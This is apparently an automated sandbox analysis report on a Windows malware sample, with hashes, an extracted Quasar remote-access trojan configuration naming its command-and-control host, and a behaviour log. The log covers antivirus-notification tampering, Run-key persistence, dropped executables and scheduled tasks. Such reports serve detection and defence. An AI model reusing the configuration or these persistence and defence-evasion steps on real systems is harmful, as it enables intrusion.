Resubmissions
Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 20:09
General
-
Target
lol.exe
-
Size
13.1MB
-
MD5
621d4a616715d165ed2c10e48e5fd94b
-
SHA1
7fabfdb5167e59d0442df460e1b236cb5bc75fbe
-
SHA256
7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde
-
SHA512
793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442
-
SSDEEP
196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" xrtlhfmpdy.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" xrtlhfmpdy.exe -
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x00070000000233d5-2920.dat family_quasar behavioral1/memory/4200-3025-0x0000000000020000-0x0000000000344000-memory.dmp family_quasar -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" xrtlhfmpdy.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" xrtlhfmpdy.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/2740-39-0x00000000061B0000-0x0000000006700000-memory.dmp net_reactor behavioral1/memory/2740-40-0x0000000005C50000-0x000000000619E000-memory.dmp net_reactor behavioral1/memory/2740-48-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-49-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-66-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-74-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-81-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-90-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-88-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-94-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-92-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-108-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-96-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-123-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-119-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-125-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-117-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-121-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-115-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-113-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-86-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-84-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-82-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-78-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-76-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-72-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-70-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-68-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-64-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-62-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-59-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-55-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-53-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-57-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor behavioral1/memory/2740-51-0x0000000005C50000-0x0000000006199000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation jaffa.exe -
Executes dropped EXE 12 IoCs
pid Process 2444 loader.exe 2740 Rover.exe 4200 scary.exe 5272 the.exe 5640 Romilyaa.exe 1672 ac3.exe 4780 jaffa.exe 5460 xrtlhfmpdy.exe 336 dkjmelpcwqstgwc.exe 5968 fqlmsghx.exe 1676 addvjytjpmrfj.exe 5936 fqlmsghx.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 336 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1" xrtlhfmpdy.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dpplxixb = "xrtlhfmpdy.exe" dkjmelpcwqstgwc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ddruklkh = "dkjmelpcwqstgwc.exe" dkjmelpcwqstgwc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "addvjytjpmrfj.exe" dkjmelpcwqstgwc.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\h: fqlmsghx.exe File opened (read-only) \??\w: fqlmsghx.exe File opened (read-only) \??\t: xrtlhfmpdy.exe File opened (read-only) \??\b: fqlmsghx.exe File opened (read-only) \??\w: xrtlhfmpdy.exe File opened (read-only) \??\n: fqlmsghx.exe File opened (read-only) \??\u: xrtlhfmpdy.exe File opened (read-only) \??\v: xrtlhfmpdy.exe File opened (read-only) \??\x: xrtlhfmpdy.exe File opened (read-only) \??\p: fqlmsghx.exe File opened (read-only) \??\r: fqlmsghx.exe File opened (read-only) \??\o: fqlmsghx.exe File opened (read-only) \??\k: xrtlhfmpdy.exe File opened (read-only) \??\s: xrtlhfmpdy.exe File opened (read-only) \??\y: fqlmsghx.exe File opened (read-only) \??\e: fqlmsghx.exe File opened (read-only) \??\j: fqlmsghx.exe File opened (read-only) \??\e: fqlmsghx.exe File opened (read-only) \??\t: fqlmsghx.exe File opened (read-only) \??\z: fqlmsghx.exe File opened (read-only) \??\z: xrtlhfmpdy.exe File opened (read-only) \??\u: fqlmsghx.exe File opened (read-only) \??\i: xrtlhfmpdy.exe File opened (read-only) \??\s: fqlmsghx.exe File opened (read-only) \??\x: fqlmsghx.exe File opened (read-only) \??\x: fqlmsghx.exe File opened (read-only) \??\h: xrtlhfmpdy.exe File opened (read-only) \??\p: fqlmsghx.exe File opened (read-only) \??\r: fqlmsghx.exe File opened (read-only) \??\h: fqlmsghx.exe File opened (read-only) \??\m: fqlmsghx.exe File opened (read-only) \??\i: fqlmsghx.exe File opened (read-only) \??\g: xrtlhfmpdy.exe File opened (read-only) \??\m: xrtlhfmpdy.exe File opened (read-only) \??\l: xrtlhfmpdy.exe File opened (read-only) \??\j: fqlmsghx.exe File opened (read-only) \??\k: fqlmsghx.exe File opened (read-only) \??\l: fqlmsghx.exe File opened (read-only) \??\t: fqlmsghx.exe File opened (read-only) \??\g: fqlmsghx.exe File opened (read-only) \??\i: fqlmsghx.exe File opened (read-only) \??\n: xrtlhfmpdy.exe File opened (read-only) \??\o: xrtlhfmpdy.exe File opened (read-only) \??\g: fqlmsghx.exe File opened (read-only) \??\q: fqlmsghx.exe File opened (read-only) \??\u: fqlmsghx.exe File opened (read-only) \??\a: xrtlhfmpdy.exe File opened (read-only) \??\b: xrtlhfmpdy.exe File opened (read-only) \??\y: fqlmsghx.exe File opened (read-only) \??\p: xrtlhfmpdy.exe File opened (read-only) \??\a: fqlmsghx.exe File opened (read-only) \??\m: fqlmsghx.exe File opened (read-only) \??\o: fqlmsghx.exe File opened (read-only) \??\z: fqlmsghx.exe File opened (read-only) \??\a: fqlmsghx.exe File opened (read-only) \??\b: fqlmsghx.exe File opened (read-only) \??\k: fqlmsghx.exe File opened (read-only) \??\v: fqlmsghx.exe File opened (read-only) \??\j: xrtlhfmpdy.exe File opened (read-only) \??\q: xrtlhfmpdy.exe File opened (read-only) \??\r: xrtlhfmpdy.exe File opened (read-only) \??\y: xrtlhfmpdy.exe File opened (read-only) \??\n: fqlmsghx.exe File opened (read-only) \??\w: fqlmsghx.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" xrtlhfmpdy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" xrtlhfmpdy.exe -
AutoIT Executable 10 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000233cc-3039.dat autoit_exe behavioral1/files/0x00070000000233ce-3082.dat autoit_exe behavioral1/files/0x000700000002344d-3087.dat autoit_exe behavioral1/files/0x000700000002344e-3108.dat autoit_exe behavioral1/files/0x000700000002344f-3111.dat autoit_exe behavioral1/files/0x0007000000023450-3116.dat autoit_exe behavioral1/files/0x0007000000023467-3160.dat autoit_exe behavioral1/files/0x0007000000023468-3163.dat autoit_exe behavioral1/files/0x0007000000023481-3204.dat autoit_exe behavioral1/files/0x0007000000023481-3681.dat autoit_exe -
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\SysWOW64\xrtlhfmpdy.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\dkjmelpcwqstgwc.exe jaffa.exe File created C:\Windows\SysWOW64\fqlmsghx.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\fqlmsghx.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\addvjytjpmrfj.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll xrtlhfmpdy.exe File created \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification C:\Windows\SysWOW64\xrtlhfmpdy.exe jaffa.exe File created C:\Windows\SysWOW64\dkjmelpcwqstgwc.exe jaffa.exe File created C:\Windows\SysWOW64\addvjytjpmrfj.exe jaffa.exe File opened for modification \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe fqlmsghx.exe -
Drops file in Program Files directory 16 IoCs
description ioc Process File created \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe fqlmsghx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe fqlmsghx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.nal fqlmsghx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe fqlmsghx.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe fqlmsghx.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe fqlmsghx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe fqlmsghx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.nal fqlmsghx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.nal fqlmsghx.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe fqlmsghx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.nal fqlmsghx.exe File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe fqlmsghx.exe File opened for modification \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe fqlmsghx.exe File created \??\c:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe fqlmsghx.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\mydoc.rtf jaffa.exe File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification C:\Windows\mydoc.rtf WINWORD.EXE File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe fqlmsghx.exe File created C:\Windows\~$mydoc.rtf WINWORD.EXE File opened for modification \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_ce10e80fc93afe5c\MsoIrmProtector.doc.exe fqlmsghx.exe File opened for modification \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_ebc47b06544bfaab\MsoIrmProtector.doc.exe fqlmsghx.exe File created \??\c:\Windows\WinSxS\wow64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.746_none_f619255888acbca6\MsoIrmProtector.doc.exe fqlmsghx.exe -
pid Process 2800 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString iexplore.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2108 schtasks.exe 2132 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4428 timeout.exe 2068 timeout.exe 620 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS iexplore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU iexplore.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Kills process with taskkill 4 IoCs
pid Process 3548 taskkill.exe 1532 taskkill.exe 424 taskkill.exe 5912 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c860705db5a8cf4ca8690a2d7700330800000000020000000000106600000001000020000000ce9efd462dd5cb5c88152f9cc7560bb66e75308eb5bf7c193abae8da2f6a3828000000000e8000000002000020000000019b5a7a346180c338d4a4fb26a7f8e7648cdb382810a7b502c077a7d5d9fa3020000000fdca7f355eee0692cff508c57161a5ea811194ac99fc6e76de1372ba54e46d3b4000000019ce711d33670e9556c0aa4d12a7daed8cbf8103399ce234069f6dc52873e60e6c3654da9433c440fa427007f59804b34bb415f163217c7ea851822b46b78a96 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6301EF06-1940-11EF-BA70-46FD0705B728} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 100bbc3d9454bf01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c860705db5a8cf4ca8690a2d7700330800000000020000000000106600000001000020000000061f7ebbb8518143ff80af271dd68c90cf7af7b10bcdceefa98e52f6a9956ac2000000000e8000000002000020000000f13ef3dfa8e7feae22927b19e339d7ce827ff9eee444c85e9b36a58506dd055d200000006a384d97f87cc098ff2480004161e225a8bea04a76b0a6d25ba08b89e518b25d40000000bad4288e9008b06df7cae87bb5d3802295f08c2ee85b5dfd9221a7557258a4ca1d4e1f369e813d00e4de356f4fba4ac27e49aabee99584deafbe583e9a8fa286 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3095b23d9454bf01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "1786960606" iexplore.exe -
Modifies registry class 21 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7E89FF83485F82689132D62E7E91BDE7E632594A66456341D79E" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "1844C67514E0DBBEB8CF7CE8ED9534BA" jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat xrtlhfmpdy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc xrtlhfmpdy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs xrtlhfmpdy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" xrtlhfmpdy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com3 = "2FB6B02B47E239EF52CDBAD5329DD4CE" jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsh xrtlhfmpdy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile" xrtlhfmpdy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsf xrtlhfmpdy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile" xrtlhfmpdy.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings cmd.exe Set value (str) 